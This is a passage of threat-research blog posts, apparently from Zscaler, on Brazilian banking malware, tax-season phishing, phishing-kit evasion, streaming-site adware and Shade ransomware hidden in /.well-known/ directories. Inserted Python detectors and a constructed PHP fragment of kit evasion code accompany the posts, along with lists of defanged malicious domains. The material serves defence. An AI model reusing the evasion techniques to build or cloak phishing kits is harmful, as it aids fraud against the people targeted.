banese                       https://www.banese.com.br/
banestes                     https://www.banestes.com.br/
bancodoestadodopar           https://www.banpara.b.br/
bancobs2                     https://www.bs2.com/
citibankbrasil               https://www.citibank.com.br
bancofibraonline             https://www.bancofibra.com.br/
agibank                      https://www.agibank.com.br/
bancoguanabara               http://www.bancoguanabara.com.br/
ccbbrasil                    http://www.br.ccb.com
bancoindusval                https://www.bip.b.br/ir
internetbankingbancointer    https://internetbanking.bancointer.com.br/
modalbanking                 https://modalbanking.modal.com.br/
bancopan                     https://www.bancopan.com.br/
pineonline                   https://www.pine.com/

Fig. 12: Some of the targeted bank strings found in the malware

Conclusion

Brazilian actors are among the top contributors to global cybercrime, and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we observed them targeting Brazilian financial institutions with malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.

2019 tax season phishing scams

Tax time is here again and that means two things: writing big checks to Uncle Sam and, of course, a new season of tax scams brought to you by industrious and persistent malware authors. Americans feeling the rising panic of making sure they are squared up with the federal government before April 15 are searching for help online and downloading the financial statements they need for filing. The bad actors are counting on it and, as you read this, there is a high probability that somewhere in your inbox is a link to a scam attempting to collect sensitive information from you. The IRS has been warning people about some of this season's tax scams in its annual "Dirty Dozen" compilation of phishing and online scams.

Of the following scenarios, which do you think is more likely? Will you be phished by a dodgy-looking IRS website, or by a bogus financial website? Here at Zscaler, the ThreatLabZ research team has been monitoring such traffic, and we have seen an increase in attempted generic phishing attacks posing as financial institutions. This trend makes sense, because tax preparation usually means collecting tax documents from several different financial institutions: your bank, your mortgage holder, your retirement and investment accounts, and so on. The following figure depicts financial and tax refund phishing events observed in the Zscaler cloud over the past two months.

Figure 1: Financial (gold) and tax refund (green) phishing events over the past two months

"IRS Login" phishing

Though the majority of phishing sites impersonated "generic" financial institutions, we did see IRS phishing websites, including the following, which asks the user to enter an email address and then redirects to a page to "verify" the account by filling in additional information, including the Social Security Number.
Figure 2: IRS Phishing – Login page

Figure 3: IRS Phishing – Personal and SSN details

Fake “Apply for EIN” scam and Google SEO poisoning

An EIN (Employer Identification Number) is a Federal Tax ID number required by businesses or other entities to file taxes. Required persons/entities can apply for an EIN on the IRS website and can get it immediately at no cost. Scammers have been active out there, attempting to phish unsuspecting users of their information and money by advertising themselves as experts in filing for Tax IDs. A Google search of “irs tax id” resulted in multiple scamming websites among the top ads.

Figure 4: Google search results for IRS Tax ID showing ads for scamming websites

We noticed a few of these sites, such as irs-tax-id[.]com, gov-irs-ein[.]co, and irs-ein-tax[.]com, using the same phishing template for their homepage, which you can see in the image below.

Figure 5: “Apply for EIN” phishing template used by multiple sites

Figure 6: Phishing page requesting personal information including SSN

Figure 7: Phishing page requesting credit card information

Here are a few of the domains that are active in luring users to apply for an Employer Identification Number (EIN).

Figure 8: “Apply for EIN” phishing domains

Tax refund phishing campaign – UK

The tax year in the UK has just ended (April 6) and scammers have been preparing to take advantage of users seeking their refunds. One of the phishing domains we have been monitoring, hmrc[.]co[.]uk[.]pendingrefund[.]tk, updated its phishing pages on April 6 to keep up with tax season events. It began with a refund claim form and was changed to a form for "processing" the claim and applying it to the user's credit card.
Phishing campaign observed before April 6:

Page 1: start.php requesting name and address
Page 2: claim_details.php displaying the information entered in start.php and a fake amount
Page 3: details.php requesting detailed personal information and credit card details

Figure 9: Phishing pages observed before April 6, 2019

The current page (Tax-Refund.php) served by the phishing website (starting April 6) can be seen in the image below:

Figure 10: Phishing page observed on April 6, 2019

Malware campaign

The IRS has warned about a “Tax Transcript” email scam used by attackers to distribute malicious documents containing malware. ThreatLabZ has also noticed tax-themed malicious documents delivering Emotet and Nymaim malware, which are well-known Trojans used for stealing data and credentials, among other malicious functions. The following is the report of a recent Nymaim malware sample observed in the Zscaler Cloud Sandbox and delivered through a malicious URL:

djaccounting[.]tax/wp-admin/98-14691361298-580222944834109973.zip

Figure 11: Cloud Sandbox Report for Nymaim malware sample: 7B80A64E9A106806EE4F62A16A968661

Conclusion

Every year during tax season, our researchers identify various kinds of phishing campaigns using tax-related social engineering tactics in an attempt to collect sensitive information from unsuspecting users. You can read about some of the phishing campaigns that we observed during last year’s tax season here. The IRS has also been alerting tax filers about active tax scams and providing guidelines for safely filing taxes. At ThreatLabZ, we have been actively monitoring the latest tax scam campaigns and providing protection for Zscaler customers.

The evolution of phishing kits

Gone are the days when a phishing page was a single page designed to capture user credentials. Phishing kits have become more sophisticated, both to evade detection and to look more legitimate to the user. In this blog, we will discuss some of the latest evasive and anti-analysis techniques used by these phishing kits.

Techniques to make phishing pages look more legitimate

1. Verification of payment card number before accepting

Many phishing campaigns related to banking, online shopping, or account upgrades ask victims to provide payment details to complete their online transactions. In such cases, most phishing campaigns simply check the length of the card number (debit or credit) provided by the victim and restrict it to 16 digits to prevent random details from being entered. In some cases, attackers go one step further, using online verification services to ensure that the victim enters correct payment information. The institution that issued a particular card can be identified from the initial six or eight digits of the card number, which are called the Issuer Identification Number (IIN). Many online services provide APIs to look up the IIN of a card. The screenshot below shows one such case.

Fig. 1: Request to check IIN information of the payment card number shown in the source code

2. Changing the language of phishing content based on the victim’s geo-location

Most phishing campaigns are designed in one language based on the probable victims of the attack. Such phishing pages only work in the particular region or country that matches the language they are designed in. Like legitimate websites, which are often "localized," a few phishing campaigns, instead of using one language, deliver phishing content based on the geographical location of the victim, determined by checking the victim’s IP address. Below is one such campaign, which first checks the victim’s geo-location; all the main strings in the phishing page are variables whose values depend on the geo-location.

Fig. 2: The main heading variable on the phishing page

Fig. 3: Values of the phishing page title, heading, and submit button based on geo-location

Evasion and anti-analysis techniques

1. One-time access to the phishing page

We have seen instances where phishing pages are accessible only once; upon re-visiting the page, the user is redirected to other websites. Below is one such campaign.

Fig. 4: The victim's IP address is logged after checking whether it is the first visit

Fig. 5: The file onetime.dat stores a log of all victims’ IP addresses

Fig. 6: A victim's IP address is checked against the IP addresses in the file onetime.dat

When a client visits a phishing page such as the one discussed above, the client's IP address gets logged in a file on the first visit. On each subsequent visit, the client’s IP address is checked against the list of IPs of clients that previously visited. Based on the result of that check, access to the phishing page is granted, a “Page not found” message is returned, or the client is redirected to other websites.

2. Proxy check using online services

Recently, many phishing kits have included a hardcoded list of blacklisted IP addresses, user-agents, and hostnames known to be used by security researchers and security companies. If the client connects from a blacklisted IP or with a blacklisted user-agent, the phishing content is not served. In some cases, along with the list of hardcoded IP addresses, the client’s IP is checked using online services to see whether or not it is a proxy.

Fig. 7: Source code using an online service to check the client's IP address for a proxy

Fig. 8: Phishing page for the above-discussed campaign

3. Creating a new random name directory on each visit

To make phishing campaigns more difficult to detect, some campaigns create a new directory with a random name on each visit and host the phishing page in that directory. Below is the analysis of one such campaign.

Fig. 9: Random name directory shown on a phishing page

Fig. 10: Newly created random name directory on the web server

Fig. 11: Source code to generate a random name directory on each visit

4. Creating a new random name file on each visit

A few phishing kits were found to be creating a new file with a random name on each visit to make the site harder to identify as a phishing site.
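The techniques discussed in this post (IIN lookups, geo-localized strings, one-time access logs such as onetime.dat, online proxy checks, hard-coded blocklists, and per-visit random directories, file names and attribute values) all leave traces in a kit's PHP source once it has been recovered from a compromised host. The following Python scanner is an added example and not code from the original post: it flags those traces with heuristic regexes and weights them into a triage score. The regex patterns, the sample kit fragments and the weights are constructed assumptions about how such kits are commonly written, not signatures of any particular kit.

```python
"""Static triage of recovered phishing-kit source for the techniques
discussed above.  Added example; the indicator patterns are heuristics
(assumptions), not signatures of any specific kit."""
import re

# indicator name -> regex; all are matched case-insensitively.
INDICATORS = {
    # IIN/BIN verification of the victim's card number through an online service
    "iin_lookup": r"binlist\.net|bincodes|\biin\b",
    # Page strings selected from a geo-IP lookup of the visitor
    "geoip_localization": r"geoip|geoplugin|ip-api\.com|ipinfo\.io|countryCode",
    # One-time access: visitor IP appended to a log file and checked on revisit
    "one_time_access": r"onetime\.dat|REMOTE_ADDR[^\n]*FILE_APPEND",
    # Proxy/VPN detection through an online reputation service
    "proxy_check_service": r"proxycheck\.io|getipintel|iphub\.info|vpnapi\.io",
    # Hard-coded blocklists of researcher IPs, user agents or hostnames
    "hardcoded_blocklist": r"\$(banned|blocked|bad|black)\w*(ip|bot|agent|list)",
    # A random directory created on every visit
    "random_path_per_visit": r"mkdir\s*\(\s*(md5|uniqid|rand|\$\w*(rand|dir))",
    # Random values generated for HTML attributes
    "random_html_attributes": r"(id|name|class)\s*=\s*['\"]<\?(php)?\s*echo\s+[^>]*(rand|uniqid|md5|bin2hex)",
}
COMPILED = {name: re.compile(pat, re.I) for name, pat in INDICATORS.items()}

# Evasion techniques weigh more than cosmetic ones when ranking kits for analysis
# (weights are an assumption; adjust to your own triage priorities).
WEIGHTS = {"one_time_access": 3, "proxy_check_service": 3, "hardcoded_blocklist": 2,
           "random_path_per_visit": 2, "random_html_attributes": 1,
           "geoip_localization": 1, "iin_lookup": 1}


def scan_kit_source(source):
    """Return {indicator: [matched snippets]} for every indicator present in source."""
    hits = {}
    for name, rx in COMPILED.items():
        found = [m.group(0) for m in rx.finditer(source)]
        if found:
            hits[name] = found
    return hits


def risk_score(hits):
    """Weighted sum over the indicators returned by scan_kit_source()."""
    return sum(WEIGHTS[name] for name in hits)


# Constructed fragments in the style of the kits described above (not a working kit).
SUSPECT_KIT = r"""
$bannedIPs = array('198.51.100.7');
$seen = file('onetime.dat', FILE_IGNORE_NEW_LINES);
file_put_contents('onetime.dat', $_SERVER['REMOTE_ADDR'] . "\n", FILE_APPEND);
$geo = json_decode(file_get_contents('http://ip-api.com/json/' . $ip), true);
$title = ($geo['countryCode'] == 'DE') ? 'Konto bestaetigen' : 'Verify your account';
$issuer = file_get_contents('https://lookup.binlist.net/' . substr($cc, 0, 6));
$check = file_get_contents('https://proxycheck.io/v2/' . $ip . '?vpn=1');
mkdir(md5(uniqid(rand(), true)), 0755);
<input name="<?php echo bin2hex(random_bytes(4)); ?>" type="text">
"""

# Constructed benign contact form used as a negative control.
BENIGN_FORM = r"""
$name = htmlspecialchars($_POST['name']);
mail('info@example.com', 'Contact form', $name . "\n" . $_POST['message']);
<input name="message" type="text">
"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_KIT), ("benign", BENIGN_FORM)):
        hits = scan_kit_source(src)
        print(f"{label}: score={risk_score(hits)} indicators={sorted(hits)}")
```

Run it over every .php file of a recovered kit and sort by score to decide which kits deserve manual analysis first. A single cosmetic hit (an IIN lookup also appears in legitimate checkout code) is not evidence on its own; the evasion indicators, which are rarely seen in legitimate pages, carry the weight.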
Below is the analysis of one such phishing kit.

Fig. 12: Random name file in the URL shown on a phishing page

Fig. 13: Source code to generate a random name file on each visit

5. Random values for HTML attributes on each visit

To make a phishing page hard to analyze and detect, the values of HTML attributes are generated randomly on each visit, as shown in the phishing campaign depicted below.

Fig. 14: Randomly created values for HTML attributes

Fig. 15: Source code to generate random values for HTML attributes

Fig. 16: Phishing page related to the above-discussed campaign

Conclusion

Phishing attacks have been on the rise for a few years, but we’re seeing changes in attackers’ methodologies.

2019 NCAA Madness - Phishing and Streaming Scams

Last week, 64 of the best men's college basketball teams (68 if you count the First Four games) began their quest to cut down the nets in Minneapolis on April 8. Since the opening day of the NCAA men's college basketball tournament isn't a national holiday, most fans were likely at work when the tournament tipped off. But that shouldn't stop them from seeing their alma mater try to upset a national powerhouse or watching a No. 12 seed knock off a No. 5 seed. Thankfully, fans can stream the whole tournament through the CBS Sports website.

Zscaler ThreatLabZ noticed increased activity on sports and media sites during the games on the Zscaler cloud platform. However, IT managers or productivity hounds need not panic and pull the curtain on this viewing activity. There are very good reasons to consider allowing your diligent and fanatic workers a chance to cheer for their team (or just to earn some side hustle on the office bracket challenge pool). The most important reason is that blocking official streams sends users elsewhere to watch unofficial streams. These unofficial streams can lead to very real security incidents if left unchecked.

Figure 1: Sports streaming media during the NCAA Tournament for the past 10 days.

Figure 1 shows just a portion of the traffic observed by the Zscaler Cloud that is generated by streaming services during the tournament. A steady flow can be seen as far as transaction count goes, but the highlight is the total volume of bytes, which peaks at 12.35 TB per hour at one point. There is so much interest in the first round of the NCAA tournament that it is better to just allow streaming from legitimate sites if your internal infrastructure can support the load. Figure 2 shows the top official streaming sites that were visited across the Zscaler cloud in the past week for NCAA games. Blocking this activity might lead a portion of the viewership to look for alternative sites with less-respectable online reputations.
Figure 2: Top sites accessed for NCAA Tournament streaming.

To see just how bad it can get out there, the ThreatLabZ team did an analysis of some attacks seen while searching for unofficial NCAA streams. What we found was a series of adware installers, phishing attacks and fraudulent security warnings leading to malicious browser plugins. Searching for "ncaa live stream free" in Google resulted in multiple phishing links in the top 50 results.

Figure 3: An adware/phishing link in the top 50 Google search results.

Adware/phishing scams

One of the malicious streaming sites that we came across, streamcartel[.]org, is laced with adware on almost every one of its pages. When the visitor clicks anywhere on the page or attempts to close the ad, a new tab opens up, prompting the user to install a fake browser extension.

Figure 4: Streamcartel[.]org's NBA schedule page displaying a fake plugin ad.

According to information from Whois, sawlive[.]tv was registered one year ago during the NCAA tournament. It also uses other sporting events to entice users to visit the site. One of the malicious ads from the site redirects to a fake Windows security warning page.

Figure 5: Fake security warning ad/page purporting to be from Microsoft Windows Firewall.

The goal of this adware site, or of any other, is to make money by delivering unwanted ads to the user. In addition to that, this site also has a PayPal donation link asking visitors to donate money.

Figure 6: PayPal donation page for owls0071@hotmail.com (in Dutch).

Behind the scenes

The site is embedded with player/content from sawlive[.]tv, which delivers more adware. These sites serve JavaScript obfuscated using JSF*ck, an encoding mechanism that uses only six characters to express any character. Here, 5,518 characters were sent as part of a response and, when deobfuscated, resulted in only 10 characters (“sawlive[.]tv”).

Figure 7: JavaScript obfuscated using JSF*ck, served by sawlive[.]tv.
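Because JSF*ck output is drawn from an alphabet of only six characters, it has a statistical fingerprint that a proxy or sandbox can check without executing anything. The following Python code is an added example, not part of the original post or of the scripts served by sawlive[.]tv: it measures how much of a script body is made of those six characters and the longest unbroken run of them, so that both a wholly encoded script (like the 5,518-character response above) and a payload embedded in otherwise ordinary JavaScript are flagged. The sample scripts are constructed; the thresholds are assumptions to be tuned on your own traffic.

```python
"""Heuristic detection of JSF*ck-style obfuscation (six-character JavaScript)
in page or script bodies.  Added example, not code from the original post."""
import re

# The six characters JSF*ck uses; a valid program contains nothing else.
JSFUCK_CHARS = frozenset("[]()!+")
SIXCHAR_RUN = re.compile(r"[\[\]()!+]+")


def jsfuck_stats(script):
    """Length, share of the six-character alphabet and longest contiguous run,
    computed over the script with whitespace removed."""
    body = re.sub(r"\s+", "", script)
    in_set = sum(1 for c in body if c in JSFUCK_CHARS)
    runs = SIXCHAR_RUN.findall(body)
    return {
        "length": len(body),
        "ratio": in_set / len(body) if body else 0.0,
        "longest_run": max((len(r) for r in runs), default=0),
    }


def looks_like_jsfuck(script, min_len=80, min_ratio=0.98):
    """True when the whole script is (almost) entirely six-character code.
    Thresholds are assumptions; the sample on the page was 5,518 characters."""
    s = jsfuck_stats(script)
    return s["length"] >= min_len and s["ratio"] >= min_ratio


def contains_jsfuck_payload(script, min_run=80):
    """True when a long six-character run is embedded in otherwise normal JS,
    e.g. assigned to a variable and then evaluated or used as a redirect target."""
    return jsfuck_stats(script)["longest_run"] >= min_run


# Constructed sample: well-known JSF*ck atoms that together evaluate to the
# string "false" (each atom indexes into "false"/"true" coerced from booleans).
SAMPLE_JSFUCK = "+".join([
    "(![]+[])[+[]]",                 # "false"[0] -> "f"
    "(![]+[])[+!+[]]",               # "false"[1] -> "a"
    "(![]+[])[!+[]+!+[]]",           # "false"[2] -> "l"
    "(![]+[])[!+[]+!+[]+!+[]]",      # "false"[3] -> "s"
    "(!![]+[])[!+[]+!+[]+!+[]]",     # "true"[3]  -> "e"
])
# Constructed: the same payload hidden inside ordinary-looking JavaScript.
SAMPLE_MIXED = "var target = " + SAMPLE_JSFUCK + ";\nwindow.location = target;"
# Constructed benign control.
SAMPLE_BENIGN = "function add(a, b) { return a + b; }"

if __name__ == "__main__":
    for label, src in (("jsfuck", SAMPLE_JSFUCK), ("mixed", SAMPLE_MIXED),
                       ("benign", SAMPLE_BENIGN)):
        print(label, jsfuck_stats(src), looks_like_jsfuck(src),
              contains_jsfuck_payload(src))
```

The ratio check catches responses like the one in Figure 7; the longest-run check catches the more common case where a page wraps the encoded blob in a variable or an eval call. Recovering the decoded string (here “sawlive[.]tv”) still requires evaluating the expression, which belongs in an isolated JavaScript engine or sandbox, never in the analyst's own browser.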
This obfuscated JavaScript issues a request to which the malicious server responds with more obfuscated JavaScript.

Figure 8: Another cycle of obfuscated JavaScript served by the malicious site.

Whenever the user attempts to click or close the ad, a new browser tab is opened with a request to http[:]//www[.]adexchangecloud[.]com/jump/next[.]php?r=44011, which prompts the user to install a fake browser plugin, shows scareware alerts, or serves additional adware. One of the ads redirects to a fake “Adobe Flash Player” update, as shown below:

Figure 8: Fake “Adobe Flash Player” update ad.

The download/installer is flagged as malicious by our Zscaler Cloud Sandbox and also by VirusTotal.

Figure 9: Zscaler Cloud Sandbox report for “Fake Flash Player”.

Typo-squatted domains

As part of every phishing/scam campaign that abuses current trends/keywords, there are typo-squatted domains for terms associated with the NCAA tournament. Here are a few domains that have been registered in the past 10 days:

marchmadnessresults[.]com
watchmarchmadnesslive[.]com
betmarchmadness[.]fan
marchmadness[.]mba
marchmadness[.]rocks

Conclusion

The NCAA tournament is a massive draw for users around the nation. Taking a measured approach to how it is handled is critical for all businesses. The examples laid out should highlight the diversity of threats that attempt to exploit the excitement around the NCAA tournament. We encourage readers to exercise caution when doing searches or clicking on links related to streaming the tournament. Zscaler ThreatLabZ continuously monitors online activity worldwide to ensure that Zscaler customers are protected from threats, even if they are tricked into clicking a nefarious link.
IoCs

adexchangecloud[.]com
adexchangemachine[.]com
go[.]onclasrv[.]com
gsafe[.]getawesome1[.]com
inter1ads[.]com
onclickmega[.]com
sawlive[.]tv
tgun[.]tv
urldelivery[.]com

Chris Mannon and Krishna Kona are Sr. Security Researchers at Zscaler.

Abuse of hidden "well-known" directory in HTTPS sites

WordPress and Joomla are among the most popular Content Management Systems (CMSs). They have also become popular with malicious actors, as cybercriminals target sites on these platforms for hacking and injecting malicious content. During the past few weeks, ThreatLabZ researchers have detected several WordPress and Joomla sites that were serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most well-known threats to CMS sites are the result of vulnerabilities introduced by plugins, themes, and extensions. In this blog, we are focusing on the Shade/Troldesh ransomware and phishing pages that we detected last month on several hundred compromised CMS sites.

Shade ransomware has been quite active in the wild and we have been seeing a number of compromised WordPress and Joomla sites being used to spread the ransomware. The compromised WordPress sites we have seen are using versions 4.8.9 to 5.1.1 and they use SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert, among others. These compromised WordPress sites may have outdated CMS plugins/themes or server-side software, which could also be the reason for the compromise.

Fig 1: Hits of Shade and phishing in detected CMS sites

During the past month, our cloud blocked transactions for compromised WordPress and Joomla sites due to Shade ransomware payloads (13.6 percent) and phishing pages (27.6 percent), with the remaining blocks due to coinminers, adware, and malicious redirectors. We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on HTTPS websites for storing and distributing Shade ransomware and phishing pages.
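Site owners can check their own servers for this abuse. The following Python audit is an added example, not code from the original post: it walks a web root's /.well-known/ tree and flags any file that does not look like a domain-validation token, using its extension, size, name shape and leading magic bytes. The token-name rules, the size limit and the constructed demo web root are assumptions; the planted file names (msg.jpg, reso.zip) mirror the kind of artifacts listed in the IoCs of this post.

```python
"""Audit a web root's /.well-known/ tree for files that are not domain-validation
tokens.  Added example, not code from the original post; the name and size
rules are assumptions about what legitimate ACME/pki-validation files look like."""
import re
import tempfile
from pathlib import Path

VALIDATION_DIRS = {"acme-challenge", "pki-validation"}
# ACME HTTP-01 tokens are base64url file names (assumption: lower bound of 22
# characters admits real tokens, which are typically 43 characters).
TOKEN_NAME = re.compile(r"^[A-Za-z0-9_-]{22,128}$")
# Vendor pki-validation files are short hex-named .txt files (assumption).
HEX_TXT = re.compile(r"^[A-Fa-f0-9]{16,64}\.txt$")
CONTENT_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".zip", ".exe",
               ".js", ".htm", ".html", ".php", ".docx"}
MAX_TOKEN_BYTES = 1024  # an ACME key authorization is under 100 bytes
MAGIC = {b"MZ": "PE executable", b"PK": "ZIP archive", b"%PDF": "PDF document"}


def audit_well_known(webroot):
    """Return a list of {path, reasons} for suspicious files under .well-known."""
    root = Path(webroot) / ".well-known"
    findings = []
    if not root.is_dir():
        return findings
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        if path.suffix.lower() in CONTENT_EXT:
            reasons.append("content-type extension " + path.suffix.lower())
        size = path.stat().st_size
        if size > MAX_TOKEN_BYTES:
            reasons.append("%d bytes, larger than any validation token" % size)
        if path.parent.name in VALIDATION_DIRS and not (
                TOKEN_NAME.match(path.name) or HEX_TXT.match(path.name)):
            reasons.append("name is not a validation token")
        head = path.read_bytes()[:4]
        for magic, desc in MAGIC.items():
            if head.startswith(magic):
                reasons.append("file starts with %s magic" % desc)
        if reasons:
            findings.append({"path": path.relative_to(root).as_posix(),
                             "reasons": reasons})
    return findings


def build_demo_webroot():
    """Constructed web root: two legitimate validation files, one benign
    security.txt, and two planted files of the kind seen in this campaign."""
    root = Path(tempfile.mkdtemp())
    acme = root / ".well-known" / "acme-challenge"
    pki = root / ".well-known" / "pki-validation"
    acme.mkdir(parents=True)
    pki.mkdir(parents=True)
    (acme / ("A" * 43)).write_text("A" * 43 + "." + "B" * 43)   # ACME key authorization
    (pki / ("0123456789abcdef" * 2 + ".txt")).write_text("validation")
    (root / ".well-known" / "security.txt").write_text("Contact: mailto:sec@example.org\n")
    (acme / "msg.jpg").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)   # EXE disguised as image
    (pki / "reso.zip").write_bytes(b"PK\x03\x04" + b"\x00" * 60)   # ZIP with script
    return root


if __name__ == "__main__":
    for finding in audit_well_known(build_demo_webroot()):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
```

Point audit_well_known() at the document root of each virtual host and schedule it alongside the certificate-renewal job: a validation token is only needed for minutes during issuance, so anything that lingers in these directories, or that carries a content extension or executable header, deserves a look.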
The hidden /.well-known/ directory on a website is a URI prefix for well-known locations defined by the IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain. The CA will send them a specific code for an HTML page that must be located in this particular directory. The CA will then scan for this code to validate the domain.

The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site. The different types of threats that we found under the hidden directory in the past month are shown in the image below.

Fig 2: Threats in the hidden directory

Fig 3: Shade ransomware vs. phishing pages in the hidden directory

Case I: Shade/Troldesh ransomware under the hidden directory

The graph below shows the Shade/Troldesh ransomware under the hidden directory that we detected last month.

Fig 4: Shade/Troldesh ransomware hits over one month

In the case of Shade/Troldesh ransomware, every compromised site has three types of files: HTML, ZIP, and EXE (.jpg), as shown below.

Fig 5: Shade in the hidden SSL validation directory

inst.htm and thn.htm are HTML files that redirect to download ZIP files.
reso.zip, rolf.zip, and stroi-invest.zip are ZIP files that contain the JavaScript file.
msg.jpg and msges.jpg are EXE files that are the Shade ransomware.

Fig 6: Shade infection chain

Troldesh is typically spread by malspam with a ZIP attachment or a link to an HTML redirector page, which downloads the ZIP file. The malspam pretends to be an order update coming from a Russian organization.
An example of an email that has the link to the HTML redirector is shown below.

Fig 7: Malspam mail

Fig 8: Redirector to download ZIP

The ZIP file contains only the JavaScript file, with a Russian name. The JavaScript is highly obfuscated, and encrypted strings are decrypted at runtime by the function below.

Fig 9: Decryption function

After decryption, the JavaScript has the functionality shown below. It tries to connect to one of two URLs, downloads the payload into %TEMP%, and executes it.

Fig 10: Simplified JavaScript code

The downloaded payload is the new variant of Shade/Troldesh ransomware, which has been around since 2014. It has two layers of packers: custom and UPX. After unpacking, it saves its configuration in “HKEY_LOCAL_MACHINE\SOFTWARE\System32\Configuration”.

Fig 11: Shade configuration

xcnt = Count of encrypted files
xi = ID of infected machine
xpk = RSA public key for encryption
xVersion = Version of current Shade ransomware

The command-and-control (C&C) server is a4ad4ip2xzclh6fd[.]onion. It drops a TOR client in %TEMP% to connect to its C&C server. For each file, the file content and file name are encrypted with AES-256 in CBC mode with two different keys. After encryption, it changes the filename to BASE64(AES(file_name)).ID_of_infected_machine.crypted000007.

Fig 12: Encrypted files

It drops a copy of itself in %ProgramData%\Windows\csrss.exe and creates a Run registry entry for this copy with the name “BurnAware.” It drops README1.txt to README10.txt on the desktop and changes the wallpaper as shown below.

Fig 13: Shade wallpaper

The README files contain the ransom note in both Russian and English.

Fig 14: Shade ransom note

Fig 15: Zscaler sandbox report for Shade/Troldesh ransomware

Case II: Phishing pages under the hidden directory

The graph below shows the different types of phishing pages under the hidden directory that we detected last month.
Fig 16: Phishing hits over one month The phishing pages we have seen up to this point, which are hosted under SSL-validated hidden directories, are related to Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and others. Fig 17: OneDrive phishing page Fig 18: Yahoo phishing page Fig 19: DHL phishing page IOCs: aioshipping[.]com/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com/.well-known/pki-validation/mxr.pdf rangtrangxinh[.]vn/.well-known/acme-challenge/msg.jpg judge[.]education/.well-known/pki-validation/ssj.jpg hoadaklak[.]com/.well-known/acme-challenge/ssj.jpg nguyenlinh[.]vn/.well-known/acme-challenge/msg.jpg rdsis[.]in/.well-known/pki-validation/msg.jpg khanlanhdaklak[.]com/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg aioshipping[.]com:80/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com:80/.well-known/pki-validation/mxr.pdf vinhomeshalongxanh[.]xyz:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj:80/.well-known/pki-validation/msg.jpg dichvucong[.]vn:80/.well-known/acme-challenge/msg.jpg myphamnarguerite[.]com:80/.well-known/acme-challenge/mxr.pdf minifyurl[.]net:80/.well-known/pki-validation/mxr.pdf judge[.]education:80/.well-known/pki-validation/ssj.jpg minifyurl[.]net/.well-known/pki-validation/mxr.pdf neccotweethearts[.]com:80/.well-known/pki-validation/mxr.pdf backuptest[.]tomward.org.uk:80/.well-known/pki-validation/ssj.jpg mobshop[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg neccotweethearts[.]com/.well-known/pki-validation/mxr.pdf myphamnarguerite[.]com/.well-known/acme-challenge/mxr.pdf khanlanhdaklak[.]com:80/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de/.well-known/acme-challenge/messg.jpg mobshop[.]schmutzki.de/.well-known/acme-challenge/messg.jpg globalkabar[.]com/.well-known/pki-validation/sserv.jpg ereservices[.]com:80/.well-known/pki-validation/ssj.jpg dulichvietlao[.]vn:80/.well-known/acme-challenge/ssj.jpg 
backuptest[.]tomward.org.uk/.well-known/pki-validation/ssj.jpg mamycloth[.]store:80/.well-known/acme-challenge/msg.jpg business[.]driverclub.co:80/.well-known/pki-validation/msg.jpg vinhomeshalongxanh[.]xyz/.well-known/pki-validation/ssj.jpg dichvucong[.]vn/.well-known/acme-challenge/msg.jpg thuducland[.]net/.well-known/acme-challenge/sserv.jpg sahabathasyim[.]com/.well-known/acme-challenge/sserv.jpg rangtrangxinh[.]vn:80/.well-known/acme-challenge/msg.jpg lovecookingshop[.]com:80/.well-known/pki-validation/ssj.jpg ereservices[.]com/.well-known/pki-validation/ssj.jpg hoadaklak[.]com:80/.well-known/acme-challenge/ssj.jpg ceroshop[.]net/.well-known/acme-challenge/nba1.jpg thuducland[.]net:80/.well-known/acme-challenge/sserv.jpg lovecookingshop[.]com/.well-known/pki-validation/ssj.jpg entrenadorpersonalterrassa[.]com.es:80/.well-known/acme-challenge/mxr.pdf epifaniacr[.]net:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj/.well-known/pki-validation/msg.jpg globalkabar[.]com:80/.well-known/pki-validation/sserv.jpg sahabathasyim[.]com:80/.well-known/acme-challenge/sserv.jpg dulichvietlao[.]vn/.well-known/acme-challenge/ssj.jpg argfoodfest[.]e-zero.com.ar:80/.well-known/pki-validation/ssj.jpg aa[-]publisher.com:80/.well-known/mxr.pdf duandojiland[-]sapphire.com:80/.well-known/pki-validation/ssj.jpg master[-]of-bitcoin.net/.well-known/pki-validation/messg.jpg ea[-]no7.net/.well-known/pki-validation/messg.jpg tropictowersfiji[.]com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/msges.jpg tebarameatsfiji[.]com/.well-known/pki-validation/msg.jpg sbs[.]ipeary.com/.well-known/pki-validation/msges.jpg sbs[.]ipeary.com/.well-known/pki-validation/msg.jpg samyaksolution[.]co.in/.well-known/pki-validation/msges.jpg samyaksolution[.]co.in/.well-known/pki-validation/msg.jpg rosyheartsfiji[.]com/.well-known/pki-validation/pik.zip needcareers[.]com/.well-known/pki-validation/msges.jpg 
